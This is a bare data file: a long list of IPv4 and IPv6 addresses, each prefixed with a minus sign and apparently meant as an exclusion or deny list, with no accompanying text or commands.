-128.199.158.216 -23.225.239.17 -217.160.110.101 -128.199.213.77 -121.201.34.53 -71.18.91.56 -192.241.147.34 -103.35.202.163 -60.250.14.42 -185.122.140.35 -107.170.59.162 -104.224.205.108 -123.206.13.149 -122.114.61.96 -219.141.179.241 -27.254.146.98 -82.209.218.91 -45.32.249.57 -128.1.182.148 -91.142.210.134 -216.224.117.39 -122.9.29.202 -38.126.72.3 -193.142.158.116 -123.207.98.120 -188.116.17.79 -89.208.149.120 -154.56.1.61 -125.62.47.177 -45.76.176.169 -74.82.164.13 -136.0.69.176 -178.62.24.211 -132.148.82.102 -110.164.197.243 -103.74.121.194 -109.237.220.20 -119.29.121.179 -184.107.210.108 -189.113.8.58 -2a0a:7d80:1:9::98:a6 -103.232.87.74 -103.49.222.10 -103.74.121.199 -182.16.110.162 -172.246.196.203 -64.20.55.221 -125.88.169.241 -194.68.173.128 -198.50.142.169 -172.246.196.139 -119.2.48.47 -202.125.94.75 -178.172.236.52 -59.56.65.45 -45.114.94.170 -188.226.187.85 -2a0a:7d80:1:7::92:152 -150.95.211.113 -172.246.220.149 -122.114.38.208 -164.132.148.100 -133.130.99.147 -66.129.66.247 -86.127.82.116 -103.24.93.112 -79.98.27.54 -114.113.152.94 -103.40.160.43 -115.29.249.84 -62.63.190.52 -82.135.148.127 -60.205.95.162 -172.255.173.149 -121.78.196.172 -210.68.175.194 -178.172.161.67 -212.24.106.208 -119.29.103.238 -185.174.137.166 -130.211.214.54 -216.55.176.29 -202.171.225.105 -183.81.167.169 -84.2.38.70 -217.150.88.2 -153.120.168.58 -107.160.163.213 -172.107.71.42 -23.225.95.134 -185.91.108.74 -120.24.38.31 -194.186.61.102 -103.100.157.122 -104.203.82.76 -188.132.204.22 -194.88.105.35 -139.59.169.122 -153.126.200.85 -59.188.232.75 -185.4.48.120 -173.255.241.188 -23.225.113.38 -139.199.69.38 -1.195.8.57 -52.17.250.31 -178.172.236.45 -46.105.129.133 -211.149.182.225 -185.117.152.156 -43.230.201.129 -139.59.208.73 -185.13.56.48 -43.230.201.5 -142.91.243.107 -103.100.157.13 -174.137.166.87 -173.212.252.237 -208.99.81.194 -150.95.140.58 -52.58.246.251 -193.187.76.253 -64.22.68.227 -122.226.223.138 -185.46.54.163 -64.187.150.67 -103.56.63.108 -82.135.151.27 -91.121.254.198 -59.175.176.252 -148.251.84.116 -123.56.12.158 -23.104.135.115 -101.37.88.140 -103.240.213.8 -39.108.215.53 -193.111.63.142 -217.13.92.169 -173.252.192.56 -46.245.167.26 -91.230.54.67 -172.106.186.39 -188.165.25.6 -91.237.108.34 -202.171.225.142 -223.203.217.202 -183.222.58.210 -151.80.88.225 -139.129.196.62 -23.225.89.4 -5.2.186.17 -160.16.112.57 -162.243.226.220 -50.22.159.163 -87.98.178.212 -120.24.221.131 -172.106.184.40 -119.23.47.78 -133.130.119.118 -192.169.170.38 -223.100.14.185 -198.57.215.123 -160.16.112.19 -178.22.45.102 -205.147.97.244 -43.230.202.112 -198.24.161.141 -108.59.13.130 -107.187.41.186 -43.230.202.66 -178.32.190.37 -194.19.246.86 -37.59.26.180 -23.104.135.120 -54.199.221.196 -31.28.163.238 -172.255.173.151 -149.202.94.24 -172.246.196.42 -43.230.200.216 -142.44.241.87 -5.145.174.144 -107.178.147.101 -66.70.179.32 -178.236.249.190 -94.140.210.188 -185.122.140.82 -216.250.125.74 -116.127.121.96 -185.191.197.83 -149.56.160.43 -156.235.170.15 -121.40.177.29 -61.100.4.71 -115.125.176.227 -96.125.135.15 -2a0a:7d80:1:7::100:db -54.254.203.237 -103.239.242.22 -120.25.165.196 -172.247.51.130 -13.125.99.196 -117.48.202.26 -100.43.182.3 -219.132.233.189 -118.81.243.13 -209.239.172.134 -104.149.150.210 -116.1.2.249 -31.179.249.112 -85.254.126.67 -112.74.37.130 -207.246.125.95 -74.86.126.228 -216.224.117.9 -210.51.163.168 -72.47.236.238 -138.121.97.26 -206.191.155.187 -85.254.126.44 -175.6.7.214 -203.151.45.64 -101.201.52.175 -103.18.108.99 -190.228.29.100 -103.19.180.195 -218.14.226.134 -123.56.154.143 -119.122.213.177 -107.160.163.226 -106.15.41.159 -95.215.182.182 -123.207.247.192 -70.36.125.61 -192.162.231.5 -108.60.222.172 -45.114.94.131 -216.17.111.221 -216.241.30.11 -67.208.113.131 -160.16.197.182 -43.247.69.183 -194.8.14.20 -185.216.117.78 -173.236.78.81 -133.242.53.18 -178.32.52.243 -185.36.100.227 -103.205.0.73 -122.114.237.186 -103.193.175.107 -45.35.102.164 -216.155.139.211 -151.248.122.124 -108.170.25.163 -123.56.15.188 -120.76.76.130 -74.82.171.135 -5.196.35.198 -91.93.147.229 -64.150.191.193 -171.244.14.150 -37.143.14.233 -89.208.149.122 -94.199.233.25 -121.41.20.194 -107.165.201.134 -2a0a:7d80:1:7::96:16a -162.250.121.186 -23.244.241.180 -43.230.201.231 -71.6.179.248 -43.230.202.150 -185.50.199.161 -120.124.190.2 -115.231.174.104 -158.69.105.120 -68.71.129.49 -103.28.38.238 -91.224.194.67 -2a0a:7d80:1:7::96:33 -218.17.104.171 -80.73.133.247 -185.12.111.183 -172.246.220.181 -5.135.68.205 -178.33.252.37 -103.239.242.29 -85.91.142.4 -43.247.90.162 -64.22.68.231 -103.240.16.11 -204.155.31.196 -119.23.149.45 -5.2.144.11 -74.206.233.135 -185.111.73.124 -123.151.147.6 -43.230.201.11 -91.215.153.43 -110.249.136.6 -172.107.147.24 -160.16.80.96 -45.61.112.46 -104.224.192.166 -23.225.239.203 -218.253.92.245 -134.119.225.116 -121.40.216.146 -120.234.141.51 -2a0a:7d80:1:7::95:9b -45.55.164.52 -216.107.153.157 -217.61.129.117 -89.46.129.213 -153.126.201.83 -209.151.166.231 -202.171.225.136 -23.229.4.33 -121.43.161.26 -185.191.228.144 -211.25.223.84 -218.60.2.130 -212.68.42.78 -43.230.202.17 -115.125.176.42 -106.187.43.239 -133.130.125.76 -101.226.175.133 -43.230.202.118 -62.109.9.140 -182.163.102.55 -198.50.253.90 -128.199.40.192 -104.192.170.94 -169.54.76.203 -47.93.55.54 -74.221.217.5 -5.145.174.173 -103.41.125.210 -188.226.163.86 -114.55.24.98 -121.41.32.161 -86.104.177.67 -185.12.111.110 -156.235.170.105 -107.163.113.74 -122.9.29.204 -111.67.198.239 -200.184.77.203 -45.63.15.7 -103.240.214.42 -38.123.253.115 -62.63.190.66 -115.125.176.84 -93.115.31.63 -185.4.48.18 -149.210.142.59 -42.112.16.152 -195.154.49.90 -188.226.157.100 -139.162.241.120 -23.224.115.228 -123.60.202.234 -23.19.238.61 -107.163.113.60 -45.7.228.30 -172.107.64.25 -93.175.18.21 -101.132.191.193 -23.225.113.247 -199.167.129.95 -112.74.165.197 -183.111.157.78 -83.85.112.166 -216.107.153.232 -80.237.242.193 -208.100.13.37 -64.22.68.237 -157.7.208.236 -103.47.195.133 -187.87.188.155 -191.252.83.9 -103.205.3.123 -172.247.51.220 -155.94.69.222 -23.23.97.152 -2a0a:7d80:1:7::97:109 -122.165.233.157 -138.68.22.25 -103.239.242.19 -46.254.16.197 -120.77.238.140 -31.28.166.247 -178.79.150.158 -103.205.0.107 -182.161.76.184 -23.238.176.206 -209.152.161.111 -5.145.174.221 -133.242.211.155 -121.40.58.108 -166.62.52.31 -39.115.210.19 -64.237.48.163 -96.84.214.50 -144.217.255.184 -2a0a:7d80:1:7::100:2ca -199.231.209.16 -91.134.228.234 -91.207.51.63 -183.62.71.242 -198.200.41.38 -39.108.8.223 -67.159.39.37 -23.225.95.129 -114.55.53.151 -153.126.211.201 -109.169.1.74 -120.136.36.174 -195.98.7.44 -152.160.33.11 -138.68.69.240 -113.116.149.252 -104.203.82.126 -2a0a:7d80:1:7::95:30a -199.245.54.205 -74.206.240.57 -36.55.235.157 -156.237.177.185 -195.128.49.154 -160.16.222.100 -103.74.121.181 -113.196.233.165 -173.192.74.227 -188.132.147.80 -150.95.108.88 -34.236.17.190 -185.50.196.130 -222.233.54.151 -2a0a:7d80:1:9::98:145 -103.244.206.38 -2a0a:7d80:1:7::92:168 -155.94.205.143 -43.239.97.154 -216.224.117.134 -172.246.220.140 -194.186.61.101 -185.122.140.74 -192.241.208.85 -121.42.41.221 -112.74.81.60 -95.169.220.10 -222.180.162.242 -1.229.95.13 -62.210.207.118 -216.244.73.236 -104.202.185.61 -13.89.237.114 -120.55.188.80 -212.89.225.225 -142.4.103.102 -114.113.148.150 -157.52.240.70 -13.231.120.119 -41.231.53.230 -23.229.124.29 -117.173.207.144 -104.224.192.22 -149.202.67.210 -185.50.198.218 -207.154.242.5 -45.64.168.37 -82.135.148.66 -54.172.165.90 -58.87.73.178 -120.143.4.157 -176.31.214.244 -201.49.79.71 -54.196.149.68 -45.55.46.21 -219.90.122.13 -177.101.146.117 -47.91.166.141 -101.201.116.65 -133.242.199.147 -202.146.128.20 -54.36.121.235 -178.32.207.14 -123.56.153.250 -174.137.161.109 -14.102.150.13 -103.42.56.33 -162.243.236.43 -139.162.12.76 -2a0a:7d80:1:7::96:1c9 -115.125.176.181 -125.40.0.93 -204.44.66.106 -112.124.106.209 -43.230.145.32 -192.99.94.196 -122.9.229.138 -43.230.201.103 -103.231.56.113 -87.117.2.66 -45.35.102.134 -45.34.183.189 -2a0a:7d80:1:7::95:63 -192.81.211.10 -202.140.34.40 -113.200.68.72 -45.117.42.115 -54.69.133.201 -107.170.236.111 -67.205.133.142 -178.32.28.168 -174.137.149.221 -199.66.244.14 -111.231.136.44 -134.119.21.103 -122.225.105.119 -139.196.112.71 -212.20.117.247 -123.60.202.194 -27.254.146.104 -175.41.22.123 -47.92.89.167 -104.232.102.187 -172.255.173.58 -69.20.65.141 -45.125.239.87 -122.9.235.219 -151.80.166.126 -23.29.120.242 -2a03:8180:1001:1a4::100:e -38.109.218.194 -153.126.129.194 -45.55.78.224 -116.62.39.19 -91.191.157.7 -37.139.5.209 -23.244.241.131 -45.114.94.210 -103.12.51.29 -52.204.107.152 -115.125.176.74 -118.184.181.153 -107.182.233.80 -172.246.196.35 -115.125.176.21 -216.224.117.90 -45.76.237.241 -2a0a:7d80:1:7::106:220 -88.214.242.109 -72.52.136.49 -216.106.96.67 -120.25.238.26 -104.232.102.156 -45.58.54.122 -79.98.108.164 -209.87.149.174 -91.229.23.126 -60.205.150.153 -119.59.67.23 -216.224.117.210 -166.62.99.13 -103.80.25.85 -107.180.76.11 -69.39.47.72 -185.45.72.216 -103.240.214.210 -23.225.239.172 -2a0a:7d80:1:7::91:7d -156.235.172.74 -58.191.155.74 -5.199.133.109 -23.234.26.66 -77.75.37.70 -2a0a:7d80:1:7::96:2fc -2a0a:7d80:1:7::101:a3 -121.42.172.245 -121.40.55.228 -108.61.12.156 -67.215.236.180 -94.130.235.37 -45.56.84.102 -216.131.117.11 -47.92.70.16 -104.202.185.128 -103.240.214.18 -67.209.122.251 -103.240.214.109 -216.55.187.196 -173.236.115.218 -139.196.20.190 -185.25.119.54 -172.246.196.96 -123.57.206.130 -23.238.129.75 -43.230.200.25 -216.155.139.218 -47.89.44.45 -38.128.113.176 -115.125.176.207 -93.188.164.192 -137.74.214.132 -5.135.108.182 -70.32.104.238 -173.209.63.34 -139.99.113.98 -159.122.78.248 -61.183.247.71 -80.233.244.68 -27.111.32.164 -5.145.175.130 -92.222.209.25 -5.160.219.62 -185.200.60.8 -54.234.137.43 -27.118.26.61 -192.64.118.146 -107.187.41.144 -61.147.67.164 -5.199.172.148 -5.178.109.188 -58.22.103.148 -122.114.36.200 -185.12.111.84 -172.246.220.187 -45.41.92.143 -216.70.113.208 -5.178.109.250 -107.163.113.197 -174.78.57.118 -67.205.175.20 -169.61.69.3 -41.207.54.83 -2a0a:7d80:1:7::96:36d -34.210.104.131 -203.151.209.98 -188.51.150.51 -130.89.141.60 -222.122.226.169 -2a0a:7d80:1:9::98:84 -103.12.49.45 -43.230.201.27 -98.158.150.192 -120.78.153.157 -222.186.169.11 -173.82.77.229 -139.162.187.195 -43.230.201.17 -94.103.32.33 -108.61.219.200 -162.243.241.186 -119.29.154.115 -107.178.150.74 -95.85.24.248 -181.65.239.185 -222.184.35.6 -188.166.206.117 -174.137.128.108 -213.159.210.79 -153.120.7.130 -2a0a:7d80:1:7::91:149 -103.28.38.208 -2a0a:7d80:1:7::97:2cc -103.48.6.43 -153.122.31.68 -122.9.5.34 -220.181.86.46 -183.129.170.199 -204.93.161.250 -185.66.68.169 -137.74.33.168 -69.4.87.61 -88.99.110.93 -108.61.246.161 -151.248.122.184 -123.56.47.136 -149.56.36.184 -192.102.6.177 -122.225.112.71 -149.202.111.154 -77.235.54.108 -123.206.188.198 -2a0a:7d80:1:7::93:18e -204.44.79.64 -158.69.78.133 -107.150.58.155 -49.212.53.64 -106.75.165.79 -122.114.107.216 -2a0a:7d80:1:7::100:347 -178.62.161.216 -192.237.249.89 -211.143.226.114 -34.225.255.229 -58.218.213.115 -62.109.23.24 -94.180.105.104 -153.126.128.102 -95.211.205.93 -5.145.175.150 -103.75.188.108 -188.166.92.89 -103.35.148.152 -2a0a:7d80:1:7::101:114 -156.67.217.21 -209.152.170.7 -5.255.93.252 -94.23.85.57 -218.65.86.76 -162.243.240.222 -103.74.117.236 -103.206.184.92 -43.230.203.165 -172.107.64.21 -107.187.41.46 -92.42.110.111 -219.94.251.210 -185.26.122.127 -34.245.33.51 -67.229.63.97 -54.172.84.96 -74.127.45.162 -169.57.62.135 -218.28.29.25 -104.245.102.28 -104.251.238.145 -93.190.41.104 -112.126.68.52 -160.99.55.154 -199.91.72.2 -185.66.140.17 -121.41.108.210 -2a0a:7d80:1:7::101:37c -185.86.210.111 -173.237.185.53 -116.58.170.214 -123.57.11.189 -104.207.52.89 -101.200.80.188 -222.242.172.142 -194.19.246.140 -101.200.189.126 -80.82.167.102 -77.77.151.131 -180.178.33.108 -210.202.8.105 -163.44.171.170 -83.167.242.168 -46.22.220.50 -159.148.37.117 -103.239.242.16 -188.166.213.57 -68.171.211.124 -204.74.223.107 -122.183.102.124 -94.23.215.165 -67.205.175.36 -23.110.56.110 -51.255.62.113 -23.19.237.52 -132.148.6.152 -185.13.59.176 -150.95.183.104 -123.56.44.121 -82.223.18.232 -218.95.164.2 -185.17.182.197 -112.121.188.254 -103.240.213.192 -116.62.110.225 -217.61.129.61 -107.178.149.85 -123.57.47.119 -122.128.109.43 -207.210.68.43 -104.245.102.56 -37.216.204.226 -51.255.120.209 -118.190.93.244 -174.138.175.182 -160.16.236.157 -46.105.172.246 -66.55.156.138 -60.205.211.145 -58.53.94.122 -220.191.238.103 -84.19.175.151 -216.107.153.177 -23.225.95.58 -103.100.209.22 -64.186.23.75 -107.186.35.142 -202.171.225.119 -162.217.133.117 -152.160.33.14 -193.33.132.199 -185.93.245.78 -222.189.228.45 -172.255.173.69 -188.165.10.138 -23.225.95.157 -67.229.72.109 -47.90.81.8 -107.163.113.66 -218.93.208.109 -45.76.234.149 -27.223.3.219 -34.203.11.97 -119.29.7.174 -211.149.224.82 -138.201.86.214 -91.121.55.39 -124.232.156.39 -173.236.115.12 -54.38.43.155 -104.203.82.14 -46.101.210.30 -190.210.186.242 -2a0a:7d80:1:7::106:319 -217.23.4.12 -5.178.109.194 -54.38.78.177 -202.171.225.101 -95.46.198.114 -217.23.11.141 -45.35.125.51 -160.16.214.101 -198.11.212.235 -23.225.89.137 -2a01:4f8:c17:312::2 -172.246.220.189 -109.169.76.28 -149.56.165.167 -103.240.215.145 -52.33.31.149 -54.248.238.15 -123.57.27.240 -23.88.82.104 -213.222.0.36 -103.248.254.51 -199.182.173.196 -65.60.9.134 -47.52.144.97 -149.56.160.42 -188.132.228.106 -209.188.26.196 -185.62.189.176 -175.45.184.213 -212.68.42.76 -2a0a:7d80:1:7::103:16f -54.254.162.100 -103.240.212.124 -67.205.139.152 -23.238.145.103 -45.35.102.130 -110.45.193.91 -119.29.26.76 -45.64.128.37 -54.238.165.34 -180.178.44.36 -103.249.104.171 -123.206.120.56 -52.193.236.167 -111.67.198.234 -159.8.47.107 -185.66.140.181 -131.255.104.15 -5.149.253.56 -100.37.146.92 -104.202.185.127 -47.74.145.74 -91.195.200.83 -156.237.177.182 -125.227.143.81 -45.76.96.53 -114.55.24.117 -212.24.109.7 -2a0a:7d80:1:7::95:23f -117.54.125.134 -75.101.136.41 -91.121.254.206 -89.38.97.23 -45.33.56.147 -101.69.170.100 -138.201.131.153 -120.27.196.116 -43.230.200.164 -114.242.70.252 -208.100.26.26 -88.99.175.17 -173.209.43.93 -103.12.51.11 -194.54.83.195 -2600:3c01::f03c:91ff:fe1f:8d0c -45.33.39.124 -43.230.202.199 -43.230.201.193 -103.80.238.163 -2a0a:7d80:1:7::92:133 -153.126.194.62 -219.94.239.147 -210.245.20.119 -180.76.151.139 -104.202.185.192 -112.124.10.145 -209.21.68.164 -185.93.68.49 -37.187.170.178 -104.202.185.44 -198.44.190.64 -68.171.211.111 -106.60.68.8 -195.54.162.49 -45.63.123.113 -139.162.17.138 -47.92.0.111 -168.90.176.82 -142.4.107.199 -116.62.100.17 -103.28.37.133 -120.76.76.188 -54.146.221.166 -45.55.81.22 -79.137.28.25 -37.187.126.56 -23.19.202.37 -178.16.172.223 -2606:1880:3:11::3 -52.77.249.119 -103.249.227.189 -178.250.245.46 -31.3.101.62 -162.247.97.185 -47.90.38.214 -104.224.192.162 -96.44.153.14 -139.129.61.153 -193.124.189.28 -120.77.84.174 -107.161.17.82 -142.91.239.68 -112.16.220.230 -91.193.204.1 -50.22.189.47 -185.69.54.80 -198.23.246.5 -119.47.89.101 -5.135.118.244 -62.210.86.117 -43.230.203.131 -149.56.20.191 -43.230.202.62 -47.52.118.195 -120.26.193.225 -93.188.165.215 -88.214.242.102 -185.140.47.239 -103.205.2.91 -41.191.76.76 -137.74.33.173 -221.132.116.38 -51.15.175.69 -115.29.145.38 -148.66.19.228 -66.254.190.205 -47.88.78.4 -59.7.18.143 -121.42.195.144 -198.55.102.79 -103.197.70.118 -199.46.124.17 -172.106.187.223 -87.76.28.103 -209.73.140.21 -106.14.61.43 -69.175.101.150 -37.187.162.199 -37.140.199.64 -114.215.169.86 -120.25.101.254 -45.35.125.40 -46.22.132.69 -211.151.129.124 -121.40.135.164 -178.33.15.66 -159.203.160.132 -89.42.24.251 -107.170.83.246 -120.76.40.17 -156.237.177.181 -2a0a:7d80:1:7::106:1fa -69.87.197.166 -46.105.145.102 -103.227.128.73 -45.117.81.213 -159.253.25.101 -103.53.171.242 -202.146.213.91 -153.126.195.87 -200.111.175.250 -178.62.124.37 -23.227.163.32 -159.89.194.75 -111.230.227.222 -167.114.116.73 -61.162.225.128 -107.163.113.31 -115.125.176.44 -172.104.154.205 -119.97.139.70 -210.51.163.175 -216.107.153.238 -46.30.176.20 -173.239.17.246 -176.114.0.46 -38.27.101.176 -91.121.184.68 -46.19.8.51 -72.10.49.133 -120.27.136.154 -104.207.44.114 -172.106.187.215 -103.80.134.215 -156.237.178.138 -188.165.215.164 -89.45.207.106 -160.16.197.91 -162.243.92.223 -62.138.6.83 -181.119.18.131 -202.171.225.130 -104.202.185.75 -216.127.151.250 -101.200.84.97 -103.219.144.134 -173.193.149.124 -195.8.206.152 -192.99.126.29 -159.203.2.172 -2a0a:7d80:1:7::91:d4 -172.107.73.215 -31.207.87.172 -43.230.203.111 -195.154.32.226 -160.16.107.212 -222.186.63.182 -103.205.2.116 -157.52.130.147 -198.235.132.76 -38.126.72.14 -107.191.51.12 -166.62.58.226 -47.88.60.210 -5.188.204.100 -192.34.62.232 -155.94.163.99 -64.120.123.148 -60.12.107.163 -91.195.200.85 -2a0a:7d80:1:9::99:222 -2a0a:7d80:1:7::103:47 -72.52.215.112 -128.199.50.78 -104.149.167.222 -101.37.18.17 -210.48.232.227 -50.23.130.158 -41.208.71.11 -185.182.96.69 -202.56.124.123 -115.125.176.139 -112.74.202.115 -209.152.190.132 -158.106.77.52 -210.245.90.173 -45.61.114.23 -39.108.65.185 -119.61.7.15 -69.64.71.114 -172.246.196.236 -120.76.97.4 -77.78.111.19 -60.251.113.251 -174.129.223.213 -23.238.237.92 -38.113.112.144 -66.171.236.200 -121.41.10.127 -103.90.137.163 -45.32.58.92 -153.126.175.149 -104.202.185.237 -64.22.68.216 -160.16.217.28 -188.226.161.54 -42.121.58.100 -103.208.204.18 -98.124.177.169 -175.122.253.5 -217.12.201.124 -125.212.250.47 -198.204.246.140 -51.254.238.199 -192.186.175.82 -166.63.21.58 -204.197.247.11 -5.45.78.67 -98.126.70.20 -153.126.194.51 -122.11.148.38 -210.184.18.142 -107.155.198.136 -18.231.122.43 -107.163.113.23 -121.254.170.244 -153.126.161.112 -120.55.160.236 -107.163.113.163 -46.249.195.222 -14.0.74.134 -159.8.209.124 -51.255.202.214 -185.8.33.54 -125.212.224.115 -87.98.154.110 -166.62.100.17 -198.176.55.25 -109.169.86.168 -133.242.1.132 -23.230.19.254 -173.252.197.108 -173.214.110.227 -104.168.87.29 -128.199.100.1 -188.166.0.219 -172.107.71.56 -153.126.150.249 -5.40.64.142 -194.19.246.58 -104.149.167.254 -50.246.16.98 -72.167.203.67 -104.238.101.87 -153.120.77.24 -162.220.115.173 -198.24.163.229 -121.40.231.8 -120.26.51.56 -172.104.35.28 -51.255.198.195 -137.74.232.114 -103.240.214.199 -173.252.192.52 -185.13.58.35 -193.227.249.164 -103.10.120.26 -92.240.245.9 -188.226.133.75 -43.230.200.74 -101.200.87.16 -149.62.172.253 -159.148.20.105 -43.230.202.33 -194.28.112.106 -173.239.30.151 -88.214.242.126 -139.199.71.137 -128.199.95.137 -103.41.125.118 -107.179.98.114 -46.16.190.124 -69.12.68.36 -128.199.103.233 -5.145.174.31 -45.34.183.137 -185.50.199.12 -45.55.28.141 -64.62.231.119 -37.59.171.144 -103.74.121.173 -195.201.27.243 -182.16.58.34 -198.199.89.178 -209.200.44.68 -59.106.237.250 -45.32.1.55 -139.196.149.48 -172.255.159.240 -200.109.158.140 -50.22.159.172 -195.24.89.62 -5.178.109.15 -43.230.202.38 -123.57.222.40 -218.32.216.154 -172.246.220.245 -162.251.180.24 -115.125.176.187 -133.130.123.162 -172.104.26.208 -185.86.210.68 -178.79.156.112 -174.136.57.114 -193.70.97.183 -54.237.195.174 -103.233.8.237 -93.188.42.204 -104.202.185.125 -185.12.95.38 -160.16.99.228 -74.86.97.186 -103.212.35.240 -198.27.77.233 -5.145.174.225 -176.31.103.194 -58.216.8.217 -103.35.202.37 -116.62.198.68 -188.132.147.35 -172.246.196.234 -185.85.191.137 -94.23.216.199 -43.246.209.180 -128.199.160.243 -216.107.153.214 -104.203.82.134 -185.91.108.189 -43.230.200.153 -209.126.107.238 -183.134.58.131 -45.77.45.32 -190.92.17.46 -104.245.102.14 -120.25.90.214 -208.109.123.221 -184.164.76.226 -204.197.242.217 -139.196.233.129 -37.139.27.225 -115.238.55.252 -46.101.185.75 -139.196.189.231 -218.232.75.230 -173.193.149.113 -184.171.240.162 -212.220.59.180 -108.61.149.28 -182.92.71.70 -5.135.112.239 -120.55.243.72 -122.200.50.9 -188.226.133.238 -124.243.223.1 -104.233.224.2 -118.184.104.158 -172.104.136.142 -68.171.211.122 -82.135.151.79 -174.137.161.96 -45.34.183.143 -104.143.41.33 -182.92.174.148 -104.207.44.109 -133.242.2.165 -149.56.195.240 -5.135.14.139 -61.28.112.214 -112.84.186.230 -218.244.144.85 -153.120.60.188 -103.14.35.209 -192.95.36.5 -103.240.214.13 -121.42.161.209 -183.181.170.6 -107.178.147.93 -185.122.140.67 -172.106.75.130 -23.110.47.196 -43.230.203.162 -139.196.137.15 -23.225.95.131 -91.216.9.103 -82.135.151.68 -34.229.219.202 -212.68.50.99 -2a0a:7d80:1:7::96:110 -147.75.130.101 -23.238.176.222 -118.184.31.171 -5.178.109.215 -220.181.86.18 -2a03:8180:1001:1a4::e -67.228.171.234 -160.16.54.141 -23.225.113.32 -133.130.117.182 -123.185.162.45 -174.37.242.43 -115.125.176.180 -172.255.173.204 -5.178.109.90 -199.19.225.142 -184.107.223.3 -2a0a:7d80:1:7::101:1de -91.239.233.191 -178.20.242.38 -119.23.132.66 -151.80.14.68 -108.59.14.153 -156.67.217.108 -5.45.75.75 -119.123.77.188 -187.194.206.161 -65.17.131.8 -107.181.251.150 -120.26.127.209 -47.92.165.216 -178.32.28.166 -103.250.21.102 -88.214.242.98 -149.12.208.142 -134.213.176.114 -107.189.161.75 -62.149.5.221 -172.104.42.156 -200.178.253.14 -113.108.114.194 -103.12.49.56 -153.126.140.82 -103.205.1.74 -43.230.201.176 -23.238.237.68 -91.198.44.11 -101.251.251.163 -79.143.178.137 -118.190.8.171 -172.255.159.196 -192.95.37.79 -27.133.158.23 -103.74.121.157 -198.200.41.25 -104.245.102.33 -200.93.220.34 -172.247.51.27 -172.107.147.58 -133.242.194.15 -178.79.170.100 -159.203.254.42 -109.239.52.198 -222.182.202.11 -91.237.109.44 -125.212.227.90 -182.92.4.108 -74.201.135.18 -69.12.68.41 -204.155.30.11 -101.200.130.188 -23.110.47.233 -167.114.138.92 -119.29.65.230 -58.138.174.169 -121.43.62.76 -91.221.206.116 -205.186.138.122 -104.225.218.172 -218.244.132.54 -103.28.39.163 -209.58.160.92 -173.236.78.73 -217.61.129.108 -89.34.16.145 -209.59.129.73 -80.77.95.12 -103.229.192.29 -172.107.73.212 -112.124.21.147 -110.172.217.18 -62.149.9.118 -202.115.139.82 -80.93.187.10 -43.229.39.30 -54.222.237.85 -2a01:7e00::f03c:91ff:fe6e:4500 -95.161.151.13 -103.4.216.163 -103.236.223.170 -5.145.175.170 -85.204.50.3 -192.198.87.245 -91.142.208.101 -194.19.246.104 -45.34.183.171 -2a0a:7d80:1:7::95:1cd -99.192.227.113 -88.208.239.60 -174.138.6.106 -107.180.84.77 -185.50.198.219 -185.4.64.107 -91.221.162.33 -200.201.204.28 -199.182.172.129 -43.230.203.48 -2a0a:7d80:1:9::99:4c -142.44.176.38 -176.221.44.189 -46.252.156.157 -51.254.199.78 -45.199.104.10 -31.28.163.233 -217.167.188.73 -43.230.200.79 -144.217.146.57 -43.230.201.83 -173.236.78.76 -203.113.38.237 -103.37.112.61 -109.235.252.137 -37.59.54.50 -120.77.204.13 -107.163.113.48 -37.97.135.130 -185.4.48.99 -23.19.237.33 -183.61.81.210 -51.254.28.214 -43.230.201.98 -115.125.176.122 -112.74.114.199 -79.98.150.21 -23.225.113.26 -104.245.102.55 -172.247.51.117 -217.30.184.97 -174.127.73.220 -176.31.215.203 -5.160.219.12 -107.167.185.72 -103.54.250.129 -109.99.179.162 -74.206.240.47 -185.26.114.193 -220.181.152.236 -64.22.68.42 -106.15.56.125 -23.225.89.217 -103.42.56.34 -139.129.206.38 -77.223.131.186 -23.19.22.30 -173.212.250.168 -108.61.126.98 -221.4.223.109 -5.178.109.91 -104.203.82.28 -115.125.176.251 -153.120.157.243 -163.44.171.253 -153.127.78.50 -153.126.194.63 -115.125.176.17 -104.245.102.9 -104.131.1.125 -216.107.153.193 -93.188.161.240 -218.106.145.217 -76.76.237.154 -111.223.33.232 -185.25.60.209 -217.61.129.107 -69.164.214.91 -195.154.165.54 -142.91.243.89 -185.50.178.84 -5.135.203.165 -103.23.79.190 -35.185.108.36 -43.230.201.22 -111.230.250.195 -164.164.165.37 -198.204.224.138 -115.159.3.122 -133.130.107.21 -83.69.226.41 -112.78.7.155 -120.25.144.23 -138.68.22.181 -64.207.152.191 -103.100.157.4 -23.227.129.21 -31.28.163.236 -47.88.19.61 -61.224.232.51 -51.254.249.82 -37.34.49.19 -185.47.131.64 -188.165.18.235 -37.187.120.11 -174.137.166.92 -120.26.45.101 -192.41.229.22 -2a0a:7d80:1:7::96:360 -185.122.140.28 -91.240.87.178 -120.25.90.240 -125.6.165.85 -39.108.8.169 -54.37.190.35 -192.162.84.166 -31.28.163.202 -188.165.141.173 -23.227.129.19 -31.24.231.176 -216.224.117.38 -96.126.116.242 -5.178.109.190 -62.63.190.38 -80.233.244.55 -104.238.82.100 -91.229.23.111 -39.108.107.169 -103.8.79.238 -43.230.201.239 -2404:c900:7::69 -43.239.221.142 -115.159.82.112 -45.114.94.141 -173.225.112.140 -27.254.146.211 -98.143.144.116 -107.178.150.119 -80.84.230.27 -2604:a880:cad:d0::36:1 -216.224.117.246 -172.255.173.120 -185.31.159.49 -2a00:1a48:1120:553::1898 -185.87.184.164 -122.114.207.101 -62.63.191.46 -134.119.155.210 -156.67.217.253 -108.170.59.206 -54.84.232.180 -113.196.235.154 -61.138.111.34 -62.149.25.51 -103.240.215.108 -103.240.214.156 -142.91.95.78 -2a0a:7d80:1:7::96:2f2 -112.74.100.181 -208.167.226.41 -104.207.52.74 -142.91.243.112 -217.66.25.243 -46.45.114.23 -130.193.10.163 -190.2.247.123 -209.58.163.181 -123.1.170.25 -198.210.32.127 -43.230.200.185 -121.41.99.190 -142.44.226.192 -210.211.97.141 -139.199.72.106 -107.6.146.98 -178.170.217.3 -37.187.92.195 -103.218.3.31 -192.169.154.22 -37.120.185.44 -52.174.233.148 -23.224.115.98 -188.226.137.200 -115.29.195.236 -103.200.32.44 -45.63.71.50 -69.16.237.76 -109.104.104.118 -132.148.20.218 -139.196.255.234 -185.66.175.77 -50.23.141.198 -146.185.16.45 -185.12.95.37 -67.208.113.159 -23.238.129.85 -109.237.212.94 -199.91.72.10 -45.63.85.36 -104.238.73.136 -103.100.157.100 -202.52.49.5 -123.56.69.26 -60.12.201.197 -85.17.30.138 -198.177.122.165 -211.149.208.95 -43.230.202.136 -115.125.176.250 -172.247.51.33 -107.150.49.210 -122.114.137.49 -103.195.240.15 -198.27.126.36 -139.196.174.209 -162.243.231.90 -156.237.178.141 -103.240.214.191 